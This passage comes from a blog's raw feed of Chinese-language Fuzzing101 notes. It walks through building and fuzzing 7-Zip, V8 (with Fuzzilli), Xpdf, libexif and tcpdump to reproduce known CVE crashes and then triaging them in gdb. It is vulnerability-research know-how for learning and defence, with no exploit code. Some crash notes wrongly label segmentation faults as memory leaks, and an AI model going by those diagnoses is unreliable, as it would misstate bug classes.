class="hljs-number">8</span>.<span class="hljs-number">0</span>.<span class="hljs-number">0</span>-<span class="hljs-number">1</span>\bin32 -- -coverage_module <span class="hljs-number">7</span>z.exe -coverage_module <span class="hljs-number">7</span>z.dll -target_module 
<span class="hljs-number">7</span>z.exe -target_offset <span class="hljs-number">0</span>x02F3B3 -nargs <span class="hljs-number">2</span> -- <span class="hljs-string">"F:\softwareAnalysis\Fuzzing\fuzzing_7zip\7-Zip\7z.exe"</span> e -y @@ <br></code></pre></td></tr></table></figure><ul><li>-coverage_module:指定覆盖率引导包含的文件,和上面Execise7里的AFL_LLVM_ALLOWLIST有点像</li><li>-target_offset:指定偏移,这里用了fuzzing101给的偏移量,需要减去基地址,而AFL++是不用的</li><li>-nargs:用于指定测试文件的运行参数数量,似乎不包含最后的输入文件</li></ul><p><img src="/image-20220816164555722.png"></p><h1 id="Exercise-10-V8-engine"><a href="#Exercise-10-V8-engine" class="headerlink" title="Exercise 10 - V8 engine"></a>Exercise 10 - V8 engine</h1><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-5847"><strong>CVE-2019-5847</strong></a> in v8 7.5(infinite recursion)</p><p> 做这个练习建议直接用<del>墙外的服务器</del>,我尝试用代理,结果浪费了很多时间</p><h2 id="安装Fuzzilli"><a href="#安装Fuzzilli" class="headerlink" title="安装Fuzzilli"></a>安装Fuzzilli</h2><p>先配置依赖,我用的是ubuntu20.04,和fuzzing101需要的依赖不太一样,18.04可以参考原作者的安装方法</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">sudo</span> apt install clang libicu-dev libpython2.<span class="hljs-number">7</span>-dev libtinfo5 libncurses5 libpython2.<span class="hljs-number">7</span> libz3-dev<br><span class="hljs-attribute">wget</span> https://swift.org/builds/swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-release/ubuntu2004/swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-RELEASE/swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-RELEASE-ubuntu20.<span 
class="hljs-number">04</span>.tar.gz<br><span class="hljs-attribute">tar</span> xzvf swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-RELEASE-ubuntu20.<span class="hljs-number">04</span>.tar.gz<br><span class="hljs-attribute">sudo</span> mv swift-<span class="hljs-number">5</span>.<span class="hljs-number">3</span>.<span class="hljs-number">3</span>-RELEASE-ubuntu20.<span class="hljs-number">04</span> /usr/share/swift<br><span class="hljs-attribute">echo</span> <span class="hljs-string">"export PATH=/usr/share/swift/usr/bin:$PATH"</span> >> ~/.bashrc<br><span class="hljs-attribute">source</span> ~/.bashrc<br></code></pre></td></tr></table></figure><p>安装fuzzilli,<a href="https://github.com/googleprojectzero/fuzzilli/">fuzzili</a>是一个针对JS引擎的fuzz工具,使用编程语言是swift</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">wget https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/googleprojectzero/</span>fuzzilli<span class="hljs-regexp">/archive/</span>refs<span class="hljs-regexp">/tags/</span>v0.<span class="hljs-number">9</span>.zip<br>unzip v0.<span class="hljs-number">9</span>.zip<br>cd fuzzilli-<span class="hljs-number">0.9</span>/<br>swift build -c release -Xlinker=<span class="hljs-string">'-lrt'</span><br></code></pre></td></tr></table></figure><h2 id="安装V8-Engine"><a href="#安装V8-Engine" class="headerlink" title="安装V8 Engine"></a>安装V8 Engine</h2><p>先下载谷歌的代码管理工具depot_tools</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> <span 
class="hljs-variable">$HOME</span><br>git <span class="hljs-built_in">clone</span> https://chromium.googlesource.com/chromium/tools/depot_tools.git<br><span class="hljs-built_in">echo</span> <span class="hljs-string">"export PATH=`pwd`/depot_tools:<span class="hljs-variable">$PATH</span>"</span> >> ~/.bashrc<br><span class="hljs-built_in">source</span> ~/.bashrc<br></code></pre></td></tr></table></figure><p>获取v8源码</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> <span class="hljs-variable">$HOME</span><br><span class="hljs-built_in">mkdir</span> Fuzzing_v8_75 && <span class="hljs-built_in">cd</span> Fuzzing_v8_75<br>fetch v8<br><span class="hljs-built_in">cd</span> v8<br>git checkout 1ca088652d3aad04caceb648bcffef100bc4abc0<br>gclient <span class="hljs-built_in">sync</span><br></code></pre></td></tr></table></figure><ul><li>gclient sync:该命令用于同步solution的各个仓库,由于v8代码中包含多个git仓库,使用checkout后需要更新其他仓库内容</li></ul><p>进行有<code>coverage instrumentation</code>的编译,这里建议先按照原文中编译一个release版本出来,测试环境是否正常</p><p>作者少加了一个patch过程,这里补上</p><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-keyword">cd</span> $HOME/Fuzzing_v8_75/v8<br><span class="hljs-string">./build/install-build-deps.sh</span><br>cp <span class="hljs-string">../../fuzzilli-0.9/Targets/V8/v8.patch</span> <span class="hljs-string">./</span><br><span class="hljs-keyword">patch</span> -p1 < v8.<span class="hljs-keyword">patch</span><br>gn gen 
out/fuzzbuild <span class="hljs-params">--args=</span>'is_debug=<span class="hljs-literal">false</span> dcheck_always_on=<span class="hljs-literal">true</span> v8_static_library=<span class="hljs-literal">true</span> v8_enable_slow_dchecks=<span class="hljs-literal">true</span> v8_enable_v8_checks=<span class="hljs-literal">true</span> v8_enable_verify_heap=<span class="hljs-literal">true</span> v8_enable_verify_csa=<span class="hljs-literal">true</span> v8_enable_verify_predictable=<span class="hljs-literal">true</span> sanitizer_coverage_flags=<span class="hljs-string">"trace-pc-guard"</span> target_cpu=<span class="hljs-string">"x64"</span>'<br>ninja -C <span class="hljs-string">./out/fuzzbuild</span><br></code></pre></td></tr></table></figure><ul><li>gn gen:生成build文件</li></ul><p>同样可以用patch命令还原文件</p><figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-symbol">patch</span>-RE -<span class="hljs-built_in">p1</span> < <span class="hljs-built_in">v8</span>.patch<br></code></pre></td></tr></table></figure><p>运行minibrowser时如果报错,需要先加载lib库</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">sudo vi <span class="hljs-regexp">/etc/</span>ld.so.conf<br>在文件中添加webkit文件夹下lib路径<br>sudo <span class="hljs-regexp">/sbin/</span>ldconfig -v<br></code></pre></td></tr></table></figure><h2 id="fuzz-4"><a href="#fuzz-4" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">swift <span class="hljs-built_in">run</span> <span class="hljs-attribute">-Xlinker</span>=<span class="hljs-string">'-lrt'</span> -c release FuzzilliCli <span 
class="hljs-attribute">--profile</span>=v8 <span class="hljs-attribute">--storagePath</span>=Targets/V8/out <span class="hljs-string">'/home/ubuntu/fuzz/fuzzing_v8/v8/out/fuzzbuild/d8'</span><br></code></pre></td></tr></table></figure><p>如果这里不加存储路径,发现的crash样本会被丢弃,导致要重新跑</p><p><img src="/image-20220829135520634.png"></p><h2 id="调试-2"><a href="#调试-2" class="headerlink" title="调试"></a>调试</h2><p>这里由于可能出现语法错误,即false positive,需要先用之前编译出来的正常Release版本运行crash,判断是否存在语法错误等问题,得到不会报错的脚本,再丢进gdb里运行</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">gdb --args v8<span class="hljs-regexp">/out/</span>fuzzbuild<span class="hljs-regexp">/d8 fuzzilli-0.9/</span>Targets<span class="hljs-regexp">/V8/</span>out<span class="hljs-regexp">/crashes/</span>crash_1662073648445_9153_deterministic_4.js<br>crash_1662137004583_12367_deterministic_4.js<br></code></pre></td></tr></table></figure>]]></content>
<tags>
<tag>Fuzz</tag>
</tags>
</entry>
<entry>
<title>Fuzzing101笔记 1~5</title>
<link href="/2022/08/02/Fuzzing101%E7%AC%94%E8%AE%B0-1-5/"/>
<url>/2022/08/02/Fuzzing101%E7%AC%94%E8%AE%B0-1-5/</url>
<content type="html"><![CDATA[<h1 id="Exercise-1-Xpdf"><a href="#Exercise-1-Xpdf" class="headerlink" title="Exercise 1 - Xpdf"></a>Exercise 1 - Xpdf</h1>
<p><a href="https://www.cvedetails.com/cve/CVE-2019-13288/"><strong>CVE-2019-13288</strong></a> in XPDF 3.02 <strong>(infinite recursion)</strong></p>
<h2 id="安装调试目标"><a href="#安装调试目标" class="headerlink" title="安装调试目标"></a>Installing the target</h2>
<p>Download from GitHub or elsewhere and extract.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">wget https://dl.xpdfreader.com/old/xpdf-3.02.tar.gz<br>tar -xvzf xpdf-3.02.tar.gz<br></code></pre></td></tr></table></figure>
<p>Install the dependencies and the target.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">sudo apt update && sudo apt install -y build-essential gcc<br>./configure --prefix="$HOME/fuzz_target/fuzzing_xpdf/install/"<br>make<br>make install<br></code></pre></td></tr></table></figure>
<p>Various environment variables can be set when running configure; the commonly used ones are</p>
<ul><li>AS: assembler name</li><li>CC: C compiler name</li><li>CXX: C++ compiler name</li><li>CPP: C preprocessor name</li><li><strong>*FLAGS</strong>: the flags for the corresponding compiler (CFLAGS, CXXFLAGS, etc.)</li><li>LD: linker name</li><li>AR: archiver name</li><li>RANLIB: symbol table generator name (see <a href="https://stackoverflow.com/questions/47910759/what-is-the-difference-between-ranlib-ar-and-ld-for-making-libraries">here</a> for what AR and RANLIB are)</li></ul>
<h2 id="获取样本"><a href="#获取样本" class="headerlink" title="获取样本"></a>Obtaining samples</h2>
<ol><li><p>Write some yourself; the fuzzer will mutate them, but this is less efficient.</p></li><li><p>Find ready-made samples online (GitHub, the official site, or bundled in the tarball).</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">cd $HOME/fuzz_target/fuzzing_xpdf<br>mkdir pdf_examples && cd pdf_examples<br>wget https://github.com/mozilla/pdf.js-sample-files/raw/master/helloworld.pdf<br>wget http://www.africau.edu/images/default/sample.pdf<br>wget https://www.melbpc.org.au/wp-content/uploads/2017/10/small-example-pdf-file.pdf<br></code></pre></td></tr></table></figure></li></ol>
<h2 id="测试安装程序运行"><a href="#测试安装程序运行" class="headerlink" title="测试安装程序运行"></a>Testing the installed program</h2>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">$HOME/fuzz_target/fuzzing_xpdf/install/bin/pdfinfo -box -meta $HOME/fuzz_target/fuzzing_xpdf/pdf_examples/helloworld.pdf<br></code></pre></td></tr></table></figure>
<h2 id="使用fuzz编译器编译(afl-clang-fast)"><a href="#使用fuzz编译器编译(afl-clang-fast)" class="headerlink" title="使用fuzz编译器编译(afl-clang-fast)"></a>Building with the fuzzing compiler (afl-clang-fast)</h2>
<p>First remove the previous installation, then rebuild and reinstall.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">rm -r install<br>cd xpdf-3.02<br>make clean<br>export LLVM_CONFIG="llvm-config-12"<br>CC=afl-clang-fast CXX=afl-clang-fast++ ./configure --prefix="$HOME/fuzz_target/fuzzing_xpdf/install/"<br>make<br>make install<br></code></pre></td></tr></table></figure>
<h2 id="fuzz"><a href="#fuzz" class="headerlink" title="fuzz"></a>fuzz</h2>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">afl-fuzz -i $HOME/fuzz_target/fuzzing_xpdf/pdf_examples/ -o $HOME/fuzz_target/fuzzing_xpdf/out/ -s 123 -- $HOME/fuzz_target/fuzzing_xpdf/install/bin/pdftotext @@ $HOME/fuzz_target/fuzzing_xpdf/output<br></code></pre></td></tr></table></figure>
<p>Parameters</p>
<ul><li>-i: input sample path</li><li>-o: output directory</li><li>-s: the seed for the random numbers used during fuzzing; set to 123 here to make the results as reproducible as possible</li><li>--: the target program</li></ul>
<p>The <code>@@</code> here must not be omitted: although the initial inputs all come from the directory given with <code>-i</code>, this parameter has to match the way the program reads its input.</p>
<ul><li>with <code>@@</code>: the fuzzed program reads its input from a file</li><li>without <code>@@</code>: the fuzzed program reads its input from standard input</li></ul>
<p>Results appear after a short run.</p>
<p><img src="/image-20220725165515904.png"></p>
<h2 id="动态调试"><a href="#动态调试" class="headerlink" title="动态调试"></a>Dynamic debugging</h2>
<p>Build a binary with debug symbols from source.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">make clean<br>CFLAGS="-g -O0" CXXFLAGS="-g -O0" ./configure --prefix="$HOME/fuzz_target/fuzzing_xpdf/install/"<br>make<br>make install<br></code></pre></td></tr></table></figure>
<p>Run gdb</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">gdb --args $HOME/fuzz_target/fuzzing_xpdf/install/bin/pdftotext $HOME/fuzz_target/fuzzing_xpdf/out/default/crashes/<your_filename> $HOME/fuzz_target/fuzzing_xpdf/output<br></code></pre></td></tr></table></figure>
<p>Tracing the crash path</p>
<ul><li>bt: view the call chain after the crash</li></ul>
<p><img src="/image-20220720090635027.png"></p>
<ul><li>Error message <code>Program received signal SIGSEGV, Segmentation fault</code>; there is a memory leak</li><li>Error location <code>_int_malloc (av=av@entry=0x7ffff7c6bb80 <main_arena>, bytes=bytes@entry=128) at malloc.c:3679</code>; glibc raised the error, so clearly something went wrong with heap memory</li><li>Execution flow: a little analysis shows the call sequence is cyclic, so this is judged to be an infinite loop bug</li><li>Locate the bug from the function calls</li></ul>
<p>Starting from the makeStream call at line 94 of xpdf/Parse.cc and following the error trace downward, you will find the nested loop; I will not demonstrate it here.</p>
<p><img src="/image-20220720100603018.png"></p>
<h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>Fixing the bug</h2>
<p>Just download the xpdf 4.02 source and compare; the fix is fairly simple: a variable was added to count the loop iterations, and the process ends once a certain count is exceeded.</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">wget https:<span class="hljs-regexp">//</span>dl.xpdfreader.com<span 
class="hljs-regexp">/old/</span>xpdf-<span class="hljs-number">4.02</span>.tar.gz<br></code></pre></td></tr></table></figure><h1 id="Exercise-2-libexif"><a href="#Exercise-2-libexif" class="headerlink" title="Exercise 2 - libexif"></a>Exercise 2 - libexif</h1><p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3895"><strong>CVE-2009-3895</strong></a> <strong>(heap-based buffer overflow</strong>)and <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2836"><strong>CVE-2012-2836</strong></a> <strong>(Out-of-bounds Read)</strong>in libexif 0.6.14</p><h2 id="安装调试目标-1"><a href="#安装调试目标-1" class="headerlink" title="安装调试目标"></a>安装调试目标</h2><p>从github等途径下载并解压</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">tar</span> -xzvf libexif-<span class="hljs-number">0</span>_6_14-release.tar.gz<br></code></pre></td></tr></table></figure><p>安装依赖</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">apt-<span class="hljs-built_in">get</span> install<br></code></pre></td></tr></table></figure><p>配置configure并安装</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs gauss">autoreconf -fvi 用于适配系统环境,简化config命令<br><span class="hljs-comment">//安装autoreconf sudo apt-get install autopoint libtool gettext libpopt-dev</span><br>./configure --<span class="hljs-keyword">enable</span>-shared=<span class="hljs-built_in">no</span> (如果是库文件,必须编译成静态库) --prefix=<span class="hljs-string">"/root/fuzz_target/fuzzing_libexif/install/"</span><br><span class="hljs-built_in">make</span><br><span 
class="hljs-built_in">make</span> install<br></code></pre></td></tr></table></figure><h2 id="获取交互应用(如果调试的是库,需要调用接口fuzz)"><a href="#获取交互应用(如果调试的是库,需要调用接口fuzz)" class="headerlink" title="获取交互应用(如果调试的是库,需要调用接口fuzz)"></a>获取交互应用(如果调试的是库,需要调用接口fuzz)</h2><ol><li>自己写一个c程序调用接口,用afl提供的编译器编译出来</li><li>直接找调用了库文件的应用,这是这题采用的方法</li></ol><h2 id="使用fuzz编译器编译(afl-clang-lto)"><a href="#使用fuzz编译器编译(afl-clang-lto)" class="headerlink" title="使用fuzz编译器编译(afl-clang-lto)"></a>使用fuzz编译器编译(afl-clang-lto)</h2><p>先删除原先的安装,重新编译安装库</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs routeros">make clean<br><span class="hljs-built_in">export</span> <span class="hljs-attribute">LLVM_CONFIG</span>=<span class="hljs-string">"llvm-config-12"</span><br><span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto ./configure <span class="hljs-attribute">--enable-shared</span>=<span class="hljs-literal">no</span> <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"/root/fuzz_target/fuzzing_libexif/install/"</span><br>make <br>make install<br></code></pre></td></tr></table></figure><p>如果编译不通过,可以加 AR=llvm-ar RANLIB=llvm-ranlib LD=afl-clang-lto</p><p>重新编译应用</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs awk">make clean<br>export LLVM_CONFIG=<span class="hljs-string">"llvm-config-12"</span><br>CC=<span class="hljs-regexp">/root/</span>fuzz<span class="hljs-regexp">/AFLplusplus/</span>afl-clang-lto .<span class="hljs-regexp">/configure --enable-shared=no --prefix="$HOME/</span>fuzz_target<span 
class="hljs-regexp">/fuzzing_libexif/i</span>nstall<span class="hljs-regexp">/" PKG_CONFIG_PATH=$HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_libexif/i</span>nstall<span class="hljs-regexp">/lib/</span>pkgconfig<br>make<br>make install<br></code></pre></td></tr></table></figure><p>测试运行</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_libexif<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/exif $HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_libexif/</span>exif-samples-master<span class="hljs-regexp">/jpg/</span>Canon_40D_photoshop_import.jpg<br></code></pre></td></tr></table></figure><h2 id="fuzz-1"><a href="#fuzz-1" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">afl-fuzz -i <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_libexif<span class="hljs-regexp">/exif-samples-master/</span>jpg<span class="hljs-regexp">/ -o $HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_libexif/</span>out<span class="hljs-regexp">/ -s 123 -- $HOME/</span>fuzz_target<span class="hljs-regexp">/fuzzing_libexif/i</span>nstall<span class="hljs-regexp">/bin/</span>exif @@<br></code></pre></td></tr></table></figure><p><img src="/image-20220725155745581.png"></p><h2 id="动态调试-1"><a href="#动态调试-1" class="headerlink" title="动态调试"></a>动态调试</h2><p>编译出带调试信息的可执行文件</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs routeros">cd libexif-libexif-0_6_14-release<br>make clean<br><span class="hljs-attribute">CFLAGS</span>=<span class="hljs-string">"-g -O0"</span> <span class="hljs-attribute">CXXFLAGS</span>=<span class="hljs-string">"-g -O0"</span> ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_libexif/install/"</span><br>make<br>make install<br><br>cd exif-exif-0_6_15-release<br>make clean<br><span class="hljs-attribute">CFLAGS</span>=<span class="hljs-string">"-g -O0"</span> <span class="hljs-attribute">CXXFLAGS</span>=<span class="hljs-string">"-g -O0"</span> <span class="hljs-attribute">PKG_CONFIG_PATH</span>=<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_libexif/install/lib/pkgconfig ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_libexif/install/"</span> <br>make<br>make install<br></code></pre></td></tr></table></figure><p>丢进gdb,跑出crash</p><h3 id="crash1"><a href="#crash1" class="headerlink" title="crash1"></a>crash1</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">gdb</span> --args ./install/bin/exif ./out/default/crashes/id\:<span class="hljs-number">000000</span>\,sig\:<span class="hljs-number">11</span>\,src\:<span class="hljs-number">000281</span>\,time\:<span class="hljs-number">64869</span>\,execs\:<span class="hljs-number">64957</span>\,op\:havoc\,rep\:<span class="hljs-number">16</span><br></code></pre></td></tr></table></figure><p><img src="/image-20220720151209643.png"></p><ul><li>报错信息<code>Program received signal SIGSEGV, Segmentation 
fault.</code>,存在内存泄漏</li><li>报错位置<code>exif_get_sshort (buf=0x555655563195 <error: Cannot access memory at address 0x555655563195>, order=EXIF_BYTE_ORDER_MOTOROLA) at exif-utils.c:92</code>,注意这里的报错,内存地址无法访问,再看地址,估计为堆缓冲区溢出</li></ul><h3 id="crash2"><a href="#crash2" class="headerlink" title="crash2"></a>crash2</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">gdb</span> --args ./install/bin/exif ./out/default/crashes/id\:<span class="hljs-number">000002</span>\,sig\:<span class="hljs-number">11</span>\,src\:<span class="hljs-number">000301</span>\,time\:<span class="hljs-number">126417</span>\,execs\:<span class="hljs-number">126621</span>\,op\:havoc\,rep\:<span class="hljs-number">8</span><br></code></pre></td></tr></table></figure><p><img src="/image-20220720151942175.png"></p><ul><li>报错信息<code>Program received signal SIGSEGV, Segmentation fault.</code>,存在内存泄露</li><li>报错位置<code>__memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:345</code></li></ul><h3 id="crash3"><a href="#crash3" class="headerlink" title="crash3"></a>crash3</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">gdb</span> --args ./install/bin/exif ./out/default/crashes/id\:<span class="hljs-number">000006</span>\,sig\:<span class="hljs-number">11</span>\,src\:<span class="hljs-number">000492</span>+<span class="hljs-number">000181</span>\,time\:<span class="hljs-number">341313</span>\,execs\:<span class="hljs-number">358541</span>\,op\:splice\,rep\:<span class="hljs-number">8</span><br></code></pre></td></tr></table></figure><p><img src="/image-20220720152601376.png"></p><ul><li>报错信息<code>Program received signal SIGSEGV, Segmentation fault</code>,存在内存泄露</li><li>报错位置<code>exif_get_slong 
(b=0x555555582000 <error: Cannot access memory at address 0x555555582000>, order=EXIF_BYTE_ORDER_MOTOROLA) at exif-utils.c:135</code>,与1类似</li></ul><h2 id="漏洞修复-1"><a href="#漏洞修复-1" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><ul><li><a href="https://github.com/libexif/libexif/commit/8ce72b7f81e61ef69b7ad5bdfeff1516c90fa361">https://github.com/libexif/libexif/commit/8ce72b7f81e61ef69b7ad5bdfeff1516c90fa361</a></li><li><a href="https://github.com/libexif/libexif/commit/00986f6fa979fe810b46e376a462c581f9746e06">https://github.com/libexif/libexif/commit/00986f6fa979fe810b46e376a462c581f9746e06</a></li></ul><h1 id="Exercise-3-tcpdump-使用ASAN"><a href="#Exercise-3-tcpdump-使用ASAN" class="headerlink" title="Exercise 3 - tcpdump(使用ASAN)"></a>Exercise 3 - tcpdump(使用ASAN)</h1><p><a href="https://www.cvedetails.com/cve/CVE-2017-13028/"><strong>CVE-2017-13028</strong></a> in TCPdump 4.9.2(Out-of-bounds Read)</p><p>libcap是tcpdump的依赖库,可以不install,但需要保证目录位置与tcpdump根目录相同,且名称可识别</p><h2 id="使用ASAN编译"><a href="#使用ASAN编译" class="headerlink" title="使用ASAN编译"></a>使用ASAN编译</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs routeros">cd <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tcpdump/libpcap-1.8.0/<br><span class="hljs-built_in">export</span> <span class="hljs-attribute">LLVM_CONFIG</span>=<span class="hljs-string">"llvm-config-12"</span><br><span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto ./configure <span class="hljs-attribute">--enable-shared</span>=<span class="hljs-literal">no</span> <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span 
class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tcpdump/install/"</span><br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make install<br><br>cd <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tcpdump/tcpdump-tcpdump-4.9.2/<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 <span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tcpdump/install/"</span><br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make install<br></code></pre></td></tr></table></figure><p>这里配置tcpdump的configure时也要加AFL_USE_ASAN=1,因为它的依赖库也加了ASAN</p><h2 id="fuzz-2"><a href="#fuzz-2" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">afl-fuzz -m none -i .<span class="hljs-regexp">/tcpdump-tcpdump-4.9.2/</span>tests<span class="hljs-regexp">/ -o ./</span>afl_out<span class="hljs-regexp">/ -s 123 -- ./i</span>nstall<span class="hljs-regexp">/sbin/</span>tcpdump -vvvvXX -ee -nn -r @@<br></code></pre></td></tr></table></figure><p>ASAN会消耗大量内存,使用<code>-m none</code>不限制内存使用</p><p>这个我跑了比较久(挂着进程容易忘关)</p><p><img src="/image-20220722203927704.png"></p><h2 id="动态调试-2"><a href="#动态调试-2" class="headerlink" title="动态调试"></a>动态调试</h2><p>有ASAN就不用再重新编译整个文件来调试了(这里如果用普通编译来运行crash反而得不到报错信息,显然这里的内存泄露不会直接导致crash)</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/install/</span>sbin<span class="hljs-regexp">/tcpdump -vvvvXX -ee -nn -r ./</span>afl_out<span class="hljs-regexp">/default/</span>crashes/id\:<span 
